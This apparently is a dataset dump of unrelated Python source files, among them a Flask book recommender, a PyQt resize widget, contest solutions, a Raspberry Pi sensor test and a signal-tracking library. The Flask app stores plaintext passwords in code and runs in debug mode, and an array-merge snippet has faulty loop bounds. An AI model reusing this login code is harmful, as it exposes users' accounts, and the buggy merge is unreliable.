render_template(\"login.html\")\r\ndatabase={'diane':'123','james':'aac','karthik':'asdsf'}\r\n\r\n@app.route('/form_login',methods=['POST','GET'])\r\ndef login_page():\r\n df=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/most_rated_books_summary_noerros.csv')\r\n titles = df['book_title']\r\n authors=df['book_author']\r\n years=df['year_of_publication']\r\n # scores=df['similarity score']\r\n images = df['image_url_l']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/books_summary_noerros.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n years_rating=df_rating['year_of_publication']\r\n images_rating = df_rating['image_url_l']\r\n name1=request.form['username']\r\n sytem=request.form['sytem']\r\n pwd=request.form['password']\r\n # COLLABORATIVE\r\n df= pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n coll_titles = df['book_title']\r\n coll_authors=df['book_author']\r\n coll_years=df['year_of_publication']\r\n coll_images= df['image_url_l']\r\n\r\n if name1 not in database:\r\n return render_template('login.html',info='Invalid User')\r\n else:\r\n if database[name1]!=pwd:\r\n return render_template('login.html',info='Invalid Password')\r\n else:\r\n if sytem ==\"content based\":\r\n return render_template('content.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n elif sytem == \"collaborative based\":\r\n return render_template('collaborative.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n\r\n@app.route('/predict', methods = ['POST']) # /result route Ratingsreviews\r\ndef predict():\r\n name = request.form['book_name']\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/mostrated.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n # years=df['year_of_publication']\r\n scores_rating=df_rating['ratings']\r\n images_rating = df_rating['image_url_l']\r\n if name is not None:\r\n try :\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n except:\r\n name= search_term_if_not_found(name,df)\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n return render_template('Recommender.html',titles_rating=titles_rating,authors_rating=authors_rating, scores_rating=scores_rating,images_rating=images_rating,title = titles,author=authors,year = years,image=images,suggestions=suggestions,searchtitles=searchtitles,searchauthors=searchauthors,searchyears=searchyears,searchimages=searchimages)\r\n@app.route('/content/<title>', methods=['GET'])\r\ndef book_content_recommend(title):\r\n name = str(title)\r\n if name is not None:\r\n books_searched=df[df['Book-Title']==name]\r\n searched_title = books_searched['Book-Title']\r\n searched_author= books_searched['Book-Author']\r\n searched_years= books_searched['Year-Of-Publication']\r\n searched_images= books_searched['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n images = result['Image-URL-L']\r\n return render_template('content_result.html',searched_years=searched_years,searched_images=searched_images,searched_title=searched_title,searched_author=searched_author,title = titles,author=authors,year = years,images=images)\r\n\r\n@app.route('/book/<coll_titles>', methods=['GET'])\r\ndef book_collaborative_recommend(coll_titles):\r\n name = str(coll_titles)\r\n combine_book_rating_data=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n books_df_s=combine_book_rating_data[combine_book_rating_data['book_title']==name]\r\n titles_searched = books_df_s['book_title']\r\n authors_searched=books_df_s['book_author']\r\n year_searched = books_df_s['year_of_publication']\r\n images_searched = books_df_s['image_url_l']\r\n user_id = books_df_s['user']\r\n user_id=user_id.iloc[0]\r\n user_r = user_id\r\n b_id =list(combine_book_rating_data.user.unique())\r\n book_arr = np.array(b_id) #get all book IDs\r\n user = np.array([user_r for i in range(len(b_id))])\r\n pred = model.predict([book_arr, user])\r\n pred = pred.reshape(-1) #reshape to single dimension\r\n pred_ids = (-pred).argsort()[0:10]\r\n top10 = combine_book_rating_data.iloc[pred_ids]\r\n f=['book_title','book_author','year_of_publication','image_url_l']\r\n displ=(top10[f])\r\n c_title = displ['book_title']\r\n c_authors = displ['book_author']\r\n c_small_image_url= displ['image_url_l']\r\n c_years= displ['year_of_publication']\r\n return render_template('result.html',year_searched=year_searched,c_years=c_years,images_searched=images_searched,authors_searched=authors_searched,titles_searched=titles_searched,c_title=c_title,c_authors=c_authors,c_small_image_url=c_small_image_url)\r\nif __name__ == '__main__':\r\n app.run(debug=True,use_reloader=False)\r\n","repo_name":"Diane10/Book_Recommender_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37866306958","text":"from PyQt5.QtCore import (\n Qt,\n QSize,\n QRect,\n pyqtSignal,\n QPoint\n)\nfrom PyQt5.QtGui import (\n QPen,\n QPainter\n)\nfrom PyQt5.QtWidgets import (\n QWidget\n)\n##\n# A special widget designed as an aid for resizing a canvas. Based on a\n# similar widget used by the GIMP.\n##\nclass ResizeHelper(QWidget):\n offsetChanged = pyqtSignal(QPoint)\n offsetXChanged = pyqtSignal(int)\n offsetYChanged = pyqtSignal(int)\n offsetBoundsChanged = pyqtSignal(QRect)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n \n self.mMouseAnchorPoint = QPoint()\n self.mOffset = QPoint()\n self.mOldSize = QSize()\n self.mDragging = False\n self.mOffsetBounds = QRect()\n self.mScale = 0.0\n self.mNewSize = QSize()\n self.mOrigOffset = QPoint()\n \n self.setMinimumSize(20, 20)\n self.setOldSize(QSize(1, 1))\n\n def oldSize(self):\n return self.mOldSize\n\n def newSize(self):\n return self.mNewSize\n\n def offset(self):\n return self.mOffset\n\n def offsetBounds(self):\n return self.mOffsetBounds\n\n def setOldSize(self, size):\n self.mOldSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setNewSize(self, size):\n self.mNewSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setOffset(self, offset):\n # Clamp the offset within the offset bounds\n newOffset = QPoint(min(self.mOffsetBounds.right(),\n max(self.mOffsetBounds.left(), offset.x())),\n min(self.mOffsetBounds.bottom(),\n max(self.mOffsetBounds.top(), offset.y())))\n if (self.mOffset != newOffset):\n xChanged = self.mOffset.x() != newOffset.x()\n yChanged = self.mOffset.y() != newOffset.y()\n self.mOffset = newOffset\n if (xChanged):\n self.offsetXChanged.emit(self.mOffset.x())\n if (yChanged):\n self.offsetYChanged.emit(self.mOffset.y())\n self.offsetChanged.emit(self.mOffset)\n self.update()\n\n ## Method to set only the X offset, provided for convenience. */\n def setOffsetX(self, x):\n self.setOffset(QPoint(x, self.mOffset.y()))\n\n ## Method to set only the Y offset, provided for convenience. */\n def setOffsetY(self, y):\n self.setOffset(QPoint(self.mOffset.x(), y))\n\n ## Method to set only new width, provided for convenience. */\n def setNewWidth(self, width):\n self.mNewSize.setWidth(width)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n ## Method to set only new height, provided for convenience. */\n def setNewHeight(self, height):\n self.mNewSize.setHeight(height)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def paintEvent(self, event):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n origX = (_size.width() - self.mNewSize.width() * self.mScale) / 2 + 0.5\n origY = (_size.height() - self.mNewSize.height() * self.mScale) / 2 + 0.5\n oldRect = QRect(self.mOffset, self.mOldSize)\n painter = QPainter(self)\n painter.translate(origX, origY)\n painter.scale(self.mScale, self.mScale)\n pen = QPen(Qt.black)\n pen.setCosmetic(True)\n painter.setPen(pen)\n painter.drawRect(QRect(QPoint(0, 0), self.mNewSize))\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.setBrush(Qt.white)\n painter.setOpacity(0.5)\n painter.drawRect(oldRect)\n pen.setColor(Qt.black)\n pen.setStyle(Qt.DashLine)\n painter.setOpacity(1.0)\n painter.setBrush(Qt.NoBrush)\n painter.setPen(pen)\n painter.drawRect(oldRect)\n painter.end()\n\n def mousePressEvent(self, event):\n self.mMouseAnchorPoint = event.pos()\n self.mOrigOffset = self.mOffset\n self.mDragging = event.button() == Qt.LeftButton\n\n def mouseMoveEvent(self, event):\n if (not self.mDragging):\n return\n pos = event.pos()\n if (pos != self.mMouseAnchorPoint):\n self.setOffset(self.mOrigOffset + (pos - self.mMouseAnchorPoint) / self.mScale)\n self.offsetChanged.emit(self.mOffset)\n\n def resizeEvent(self, event):\n self.recalculateScale()\n\n def recalculateScale(self):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n if self.mOldSize.width() < self.mNewSize.width():\n width = self.mNewSize.width()\n else:\n width = 2 * self.mOldSize.width() - self.mNewSize.width()\n if self.mOldSize.height() < self.mNewSize.height():\n height = self.mNewSize.height()\n else:\n height = 2 * self.mOldSize.height() - self.mNewSize.height()\n\n # Pick the smallest scale\n scaleW = _size.width() / width\n scaleH = _size.height() / height\n if scaleW < scaleH:\n self.mScale = scaleW\n else:\n self.mScale = scaleH\n\n self.update()\n\n def recalculateMinMaxOffset(self):\n offsetBounds = self.mOffsetBounds\n if (self.mOldSize.width() <= self.mNewSize.width()):\n offsetBounds.setLeft(0)\n offsetBounds.setRight(self.mNewSize.width() - self.mOldSize.width())\n else:\n offsetBounds.setLeft(self.mNewSize.width() - self.mOldSize.width())\n offsetBounds.setRight(0)\n\n if (self.mOldSize.height() <= self.mNewSize.height()):\n offsetBounds.setTop(0)\n offsetBounds.setBottom(self.mNewSize.height() - self.mOldSize.height())\n else:\n offsetBounds.setTop(self.mNewSize.height() - self.mOldSize.height())\n offsetBounds.setBottom(0)\n\n if (self.mOffsetBounds != offsetBounds):\n self.mOffsetBounds = offsetBounds\n self.offsetBoundsChanged.emit(self.mOffsetBounds)\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/resizehelper.py","file_name":"resizehelper.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24014953484","text":"# 二分答案\r\n\r\n# 问题在于:\r\n# 并不是说:对于一个点,向它运动的人超过不向它运动的人\r\n# 而是说:对于一个点,向它运动的人超过向其他点运动的人\r\n\r\n# 计数的时候必须两个坐标一起考虑\r\n\r\nT = int(input())\r\n\r\n\r\ndef solve(Q, dirs):\r\n # print(dirs)\r\n x0, y0 = 0, 0\r\n\r\n def check(x, y):\r\n cnt = 0\r\n for x0, y0, d0 in dirs:\r\n if d0 == 'N' and y > y0:\r\n cnt += 1\r\n if d0 == 'S' and y < y0:\r\n cnt += 1\r\n if d0 == 'W' and x < x0:\r\n cnt += 1\r\n if d0 == 'E' and x > x0:\r\n cnt += 1\r\n return cnt\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[0]):\r\n cnt = check(x, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x\r\n\r\n if x < Q:\r\n cnt = check(x + 1, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x + 1\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[1]):\r\n cnt = check(x0, y)\r\n # print(x0, y0, prev, x, y, cnt)\r\n \r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y\r\n\r\n if y < Q:\r\n cnt = check(x0, y + 1)\r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y + 1\r\n\r\n return str(x0) + \" \" + str(y0)\r\n\r\n\r\nfor t in range(1, T+1):\r\n P, Q = map(int, input().split())\r\n dirs = []\r\n for p in range(P):\r\n x, y, d = input().split()\r\n dirs.append([int(x), int(y), d])\r\n print(\"Case #%d: %s\" % (t, solve(Q, dirs)))\r\n","repo_name":"songzy12/GoogleCodingCompetitions","sub_path":"codejam/2019/Round 1B/Manhattan Crepe Cart.py","file_name":"Manhattan Crepe Cart.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40901202524","text":"__author__ = 'Veltarn'\r\n\r\nimport RPi.GPIO as GPIO\r\nimport time\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nport_number = 7\r\nGPIO.setup(port_number, GPIO.IN)\r\n\r\ndef onRising(channel):\r\n '''\r\n Called whenever the hall sensor is triggered\r\n :param channel: Number of the channel\r\n :return:\r\n '''\r\n print(\"Event on \" + str(channel))\r\n\r\ndef onFalling(channel):\r\n '''\r\n Called whenever the hall sensors stop detecting something\r\n :param channel:\r\n :return:\r\n '''\r\n print(\"Nothing to detect\")\r\n\r\ndef main():\r\n\r\n GPIO.add_event_detect(port_number, GPIO.RISING, callback=onRising)\r\n\r\n try:\r\n while True:\r\n time.sleep(0.1)\r\n except KeyboardInterrupt:\r\n GPIO.cleanup()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Veltarn/Climax","sub_path":"Tests/testhall.py","file_name":"testhall.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70862430728","text":"import datetime\nfrom datetime import datetime\n\nclass Storage(object):\n\n def __init__(self):\n self.__data = {} # { 'default': {\"key1\":[ exp1, value1]}, 'domain2': {\"key1\":[ exp1, value1] }\n\n def set(self, name, value, datatype, expiration=None, domain=\"default\"):\n try:\n if domain not in self.__data:\n self.__data.update({domain: {}})\n self.__data[domain][name] = [value, datatype, expiration]\n return \"0\"\n except Exception as e:\n return str(e)\n\n def get(self, name, domain):\n if domain in self.__data:\n rec = self.__data[domain]\n if name in rec:\n # exp in self.__data[name][0]\n if rec[name][2]: # exp is set\n now = datetime.now().timestamp()\n if now > float(rec[name][2]):\n try:\n del rec.remove[name] # remove from cache\n except Exception as e:\n pass\n return None, None\n return rec[name][0], rec[name][1] #tuple (value, datatype)\n return None, None\n\n def delete(self, name, domain):\n try:\n if domain not in self.__data:\n return \"Domain does not exists\"\n else:\n if name not in self.__data[domain]:\n return \"Key does not exists\"\n del self.__data[domain][name]\n return \"0\"\n except Exception as e:\n return str(e)\n\n\n def reset(self):\n self.__data = {}\n return \"0\"\n\n def stats(self, started, set_hit, get_hit, get_miss):\n r = {'domains': {}, 'started': started, 'set_hit': set_hit, 'get_hit': set_hit, 'get_miss': get_miss}\n for domain in self.__data:\n r[\"domains\"][domain] = {'keys': len(self.__data[domain])}\n return str(r)\n\n # if name in self.__data:\n# # exp in self.__data[name][0]\n# if self.__data[name][0]: # exp is set\n# now = datetime.now().timestamp()\n# if now > float(self.__data[name][0]):\n# try:\n# del self.__data.remove[name] # remove from cache\n# except Exception as e:\n# pass\n# return None\n# return self.__data[name][1]\n# return None\n\n def dump(self):\n return self.__data\n\n","repo_name":"lhotakj/Kasi","sub_path":"kasi/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"39931524965","text":"class Solution:\n def containsNearbyDuplicate(self, nums, k):\n store = {}\n for i in range(len(nums)):\n if nums[i] not in store:\n store[nums[i]] = []\n store[nums[i]].append(i)\n for key,v in store.items():\n if len(v) > 1:\n for i in range(1, len(v)):\n if abs(v[i-1]-v[i]) <= k:\n return True\n return False","repo_name":"mihir254/LeetCode","sub_path":"Easy/219-Contains-Duplicate-II.py","file_name":"219-Contains-Duplicate-II.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13898638298","text":"#剑指offer 类似题\n# 有两个排序的数组 A1 和 A2, 内存在 A1 的末尾有足够多的空余空间容纳 A2.\n# 请实现一个函数,把 A2中的所有数字插入 A1 中,并且所有数字是有序的\narr1 = [3, 4, 7, 9, 10]\narr2 = [1, 2, 4, 5]\n\nres = arr1 + arr2\nprint(res)\np1 = len(arr1) - 1\np2 = len(arr2) - 1\ni = len(res) - 1\nwhile p1 > 0 and p2 > 0 :\n if arr1[p1] == arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n res[i] = arr2[p2]\n i -= 1\n p1 -= 1\n p2 -= 1\n elif arr1[p1] > arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n p1 -= 1\n else:\n res[i] = arr2[p2]\n i -= 1\n p2 -= 1\n\nwhile p1 != -1:\n res[i] = arr1[p1]\n p1 -= 1\n i -= 1\nwhile p2 != -1:\n res[i] = arr2[p2]\n p2 -= 1\n i -= 1\n\nprint(res)\n\n \n ","repo_name":"jasmine2018jixun/leetcode2020","sub_path":"leetcode2019/lintcode_212_空格替换.py","file_name":"lintcode_212_空格替换.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20723265142","text":"import time\nimport json\nimport numpy as np\n\nfrom load_data import load_data\nfrom auto_ml import auto_ml\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Files\nfiles = []\nfor sim in np.arange(1, 11):\n\n files.append({\"train\": \"../data/Xy/\" + str(sim) + \"_train.csv\",\n \"test\": \"../data/Xy/\" + str(sim) + \"_test.csv\",\n \"task\": \"regression\",\n \"name\": str(sim)})\n\n# Backends\nbackends = [\"sklearn\", \"h2o\", \"tpot\"]\n\n# Settings\nruns = 10 # number of random data sets\ntime_to_run = 60 # run time for each dataset and engine in minutes\nfolds = 5 # number of folds used in cv\n\n# Loop over datasets\n#for run in [8, 9, ]:\nfor run in np.arange(runs):\n\n # Load/Sim data\n X_train, y_train, X_test, y_test = load_data(path_train=files[run][\"train\"], path_test=files[run][\"test\"])\n\n # Random Forest Benchmark\n print(\"Fitting Benchmark via Random Forest\")\n mod_rf = RandomForestRegressor(n_estimators=250)\n mod_rf.fit(X=X_train, y=y_train)\n y_hat_rf = mod_rf.predict(X=X_test)\n mse_benchmark = mean_squared_error(y_true=y_test, y_pred=y_hat_rf)\n\n # Loop over backends\n for engine in backends:\n\n # Verbose\n print(\"Starting \", engine + \" in \" + str(run), \"run\")\n\n # Start time tracking\n start_time = time.time()\n\n try:\n\n # Init model\n mod = auto_ml(backend=engine)\n mod.create_ml(run_time=time_to_run, folds=folds)\n\n # Fitting on training set\n mod.fit(X=X_train, y=y_train)\n\n # Predict on test set\n y_hat = mod.predict(X=X_test)\n\n # End time tracking\n time_elapsed = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time))\n\n # Eval error on test set\n mse_score = mean_squared_error(y_true=y_test, y_pred=y_hat)\n\n # Results\n info = {\"run\": int(run),\n \"backend\": engine,\n \"mse_test\": mse_score,\n \"mse_benchmark\": mse_benchmark,\n \"time_elapsed\": time_elapsed}\n\n # Write log\n with open(\"../results/\" + time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime(time.time())) + \"_\" + str(run) + \"_\" + str(engine) + \".json\", \"w\") as outfile:\n json.dump(info, outfile, sort_keys=True, indent=4)\n\n # Verbose\n print(\"Finished \" + engine + \" in \" + str(run) + \" run\")\n\n except (RuntimeError, TypeError, NameError):\n print(\"Error in \" + \"backend \" + engine + \" for \" + str(run), \"run\")\n\n\n\n\n","repo_name":"fabianmax/ML-Automation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"15195403998","text":"# optimizer\noptimizer = dict(type='AdamW', lr=0.00006, weight_decay=0.0001)\n# optimizer = dict(type='Adam', lr=0.001, weight_decay=0.0005)\noptimizer_config = dict()\n# learning policy\n# lr_config = dict(policy='poly', power=1.00, min_lr=1e-5, by_epoch=False)\n# lr_config = dict(\n# policy='CosineAnnealingWarmRestarts',\n# warmup='linear',\n# warmup_iters=2000,\n# warmup_ratio=1.0 / 10,\n# min_lr_ratio=1e-5)\nlr_config = dict(\n policy='CosineRestart',\n restart_weights=[1,1,1,1,1],\n periods=[3750,7500,15000,30000,60000],\n min_lr=1e-6)\n# lr_config = dict(\n# policy='CosineRestart',\n# restart_weights=[1,1,1,1,1],\n# periods=[3000,6000,12000,24000,48000],\n# min_lr=1e-6)\n# runtime settings\nrunner = dict(type='IterBasedRunner', max_iters=120000)\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=20)\nevaluation = dict(interval=2000, metric='mIoU')\n","repo_name":"nytbliang/HTMANet","sub_path":"configs/_base_/schedules/schedule_80k.py","file_name":"schedule_80k.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23436845675","text":"# -*- coding: utf-8 -*-\n\"\"\"Tracks\nEach track has a fs and a duration. There are 4 kinds of tracks:\n\n1 Event - times\n2 Wave - values\n3 TimeValue - values at times, duration\n4 Partition - values between times\n\nAll track intervals are of the type [), and duration points to the next unoccupied sample == length\n\"\"\"\n\nimport logging\nfrom builtins import str\nfrom pathlib import Path\nfrom typing import List, Optional, Union\n\nimport numpy\nfrom signalworks.tracking.metatrack import MetaTrack\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n# logger.setLevel(logging.WARNING)\n# logger.setLevel(logging.ERROR)\n\nTIME_TYPE = numpy.int64\n\n\ndef convert_dtype(source, target_dtype):\n \"\"\"\n return a link (if unchanged) or copy of signal in the specified dtype (often changes bit-depth as well)\n \"\"\"\n assert isinstance(source, numpy.ndarray)\n source_dtype = source.dtype\n assert source_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"source must be a supported type\"\n assert target_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"target must be a supported type\"\n if source_dtype == target_dtype:\n return source\n else: # conversion\n if source_dtype == numpy.int16:\n if target_dtype == numpy.int32:\n return source.astype(target_dtype) << 16\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 15)\n elif source_dtype == numpy.int32:\n if target_dtype == numpy.int16:\n return (source >> 16).astype(target_dtype) # lossy\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 31)\n else: # source_dtype == numpy.float32 / numpy.float64\n M = numpy.max(numpy.abs(source))\n limit = 1 - 1e-16\n if M > limit:\n factor = limit / M\n logger.warning(\n f\"maximum float waveform value {M} is beyond [-{limit}, {limit}],\"\n f\"applying scaling of {factor}\"\n )\n source *= factor\n if target_dtype == numpy.float32 or target_dtype == numpy.float64:\n return source.astype(target_dtype)\n else:\n if target_dtype == numpy.int16:\n return (source * (1 << 15)).astype(target_dtype) # dither?\n else: # target_dtype == numpy.int32\n return (source * (1 << 31)).astype(target_dtype) # dither?\n\n\nclass Track(MetaTrack):\n default_suffix = \".trk\"\n\n def __init__(self, path):\n self._fs = 0\n self.type: Optional[str] = None\n self.min: Union[int, float, None] = None\n self.max: Union[int, float, None] = None\n self.unit: Optional[str] = None\n self.label: Optional[str] = None\n if path is None:\n path = str(id(self))\n self.path = Path(path).with_suffix(self.default_suffix)\n\n def get_time(self):\n raise NotImplementedError\n\n def set_time(self, time):\n raise NotImplementedError\n\n time = property(get_time, set_time)\n\n def get_value(self):\n raise NotImplementedError\n\n def set_value(self, value):\n raise NotImplementedError\n\n value = property(get_value, set_value)\n\n def get_fs(self):\n return self._fs\n\n def set_fs(self, _value):\n raise Exception(\"Cannot change fs, try resample()\")\n\n fs = property(get_fs, set_fs, doc=\"sampling frequency\")\n\n def get_duration(self):\n pass\n\n def set_duration(self, duration):\n raise NotImplementedError\n\n duration = property(get_duration, set_duration)\n\n def __eq__(self, other):\n raise NotImplementedError\n\n def __ne__(self, other):\n raise NotImplementedError\n\n def __len__(self):\n pass\n\n def __str__(self):\n pass\n\n def __add__(self, other):\n raise NotImplementedError\n\n @classmethod\n def read(cls, path, samplerate=None):\n # we do the imports here to avoid circular import when Wave inherits Track, and Track call Wave's function\n # we only need a function from the dependencies\n from signalworks.tracking.partition import Partition\n from signalworks.tracking.timevalue import TimeValue\n from signalworks.tracking.wave import Wave\n from signalworks.tracking.multitrack import MultiTrack\n\n \"\"\"Loads object from name, adding default extension if missing.\"\"\"\n # E = []\n suffix = Path(path).suffix\n\n with open(path, \"rb\") as fileIn:\n bufHeader = fileIn.read(38)\n if (\n (bufHeader[0:4] == b\"RIFF\")\n and (bufHeader[12:16] == b\"fmt \")\n and (bufHeader[0:5] != b\"RIFFB\")\n ):\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n elif suffix == \".tmv\":\n return TimeValue.read_tmv(path) # for now, handle nans\n elif suffix == \".lab\":\n return Partition.read(path)\n elif suffix == \".edf\":\n return MultiTrack.read_edf(path)\n elif suffix == \".xdf\":\n return MultiTrack.read_xdf(path)\n else:\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n\n def write(self, name, *args, **kwargs):\n \"\"\"Saves object to name, adding default extension if missing.\"\"\"\n raise NotImplementedError\n\n def resample(self, fs):\n \"\"\"resample self to a certain fs\"\"\"\n raise NotImplementedError\n\n def select(self, a, b):\n \"\"\"\n return a selection of the track from a to b. a and b are in fs units.\n Times are new objects, but values are views - idea is to make a read-only section, not a copy\n \"\"\"\n raise NotImplementedError\n\n def insert(self, a, t):\n raise NotImplementedError\n\n def remove(self, a, b):\n raise NotImplementedError\n\n def copy(self, a, b):\n raise NotImplementedError\n\n def cut(self, a, b):\n t = self.copy(a, b)\n self.remove(a, b)\n return t\n\n\ndef get_track_classes() -> List[Track]:\n def all_subclasses(c):\n return c.__subclasses__() + [\n a for b in c.__subclasses__() for a in all_subclasses(b)\n ]\n\n return [obj for obj in all_subclasses(Track)]\n\n\n# TODO: class NamedEvent(_Track)\n# there hasn't been a need for it yet, but may be useful in the future\n# wonder if I can extend Event itself with optional values...\n# class NamedEvent(_Track):\n# def __init__(self, time, value, fs, duration)\n\n\n# class HetMultiTrack(MultiTrack): # may want to define common abstract class instead\n# \"\"\"\n# A dictionary containing time-synchronous tracks of equal duration, but HETEROGENOUS fs\n# \"\"\"\n\n# # this fs relates to the manner by which we time-index (possibly with float) into the multitrack object.\n# # Use 1.0 for seconds.\n# def __init__(self, mapping=dict(), fs=1.0):\n# dict.__init__(self, mapping)\n# if __debug__: # long assert - TODO: do this on mapping, and then assign\n# self.check()\n# self._fs = fs\n\n# def check(self):\n# if len(self) > 1:\n# duration = None\n# for i, (key, track) in enumerate(self.items()):\n# if duration is None:\n# duration = track.duration / track.fs\n# if track.duration / track.fs != duration:\n# raise AssertionError(\n# f\"all durations must be equal, track #{i} ('{key}') does not match track #1\"\n# )\n\n# def get_fs(self):\n# if len(self):\n# return self._fs\n# else:\n# return 0 # or raise?\n\n# def set_fs(self, fs):\n# self._fs = fs\n\n# fs = property(get_fs, set_fs, doc=\"sampling frequency of time-index\")\n\n# def select(self, a, b, keys=None):\n# assert a >= 0\n# assert a < b # or a <= b?\n# assert b <= self.duration\n# \"\"\"return a new object with all track views from time a to b\"\"\"\n# if keys is None:\n# keys = self.keys()\n# obj = type(self)()\n# for key in keys:\n# trk = self[key]\n# obj[key] = trk.select(\n# a / self._fs * trk._fs, b / self._fs * trk._fs\n# ) # untested\n# return obj\n\n# def test_pml(self):\n# import tempfile\n# tmp = tempfile.NamedTemporaryFile(prefix='test_pml_')\n# filename = tmp.name\n# tmp.close()\n# self.t.pmlwrite(filename)\n# s = Event.pmlread(filename)\n# os.unlink(filename)\n# # duration CANNOT be encoded in the file (or can it?)\n# s.duration = int(numpy.round(self.t.duration * s.fs / self.t.fs))\n# s = s.resample(self.t.fs)\n# self.assertTrue(numpy.allclose(s.time, self.t.time))\n","repo_name":"TimeViewers/signalworks","sub_path":"signalworks/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"26559230805","text":"# -*- coding: utf-8 -*-\n\n\n# Задача: вычислить 3 тикера с максимальной и 3 тикера с минимальной волатильностью в МНОГОПРОЦЕССНОМ стиле\n#\n# Бумаги с нулевой волатильностью вывести отдельно.\n# Результаты вывести на консоль в виде:\n# Максимальная волатильность:\n# ТИКЕР1 - ХХХ.ХХ %\n# ТИКЕР2 - ХХХ.ХХ %\n# ТИКЕР3 - ХХХ.ХХ %\n# Минимальная волатильность:\n# ТИКЕР4 - ХХХ.ХХ %\n# ТИКЕР5 - ХХХ.ХХ %\n# 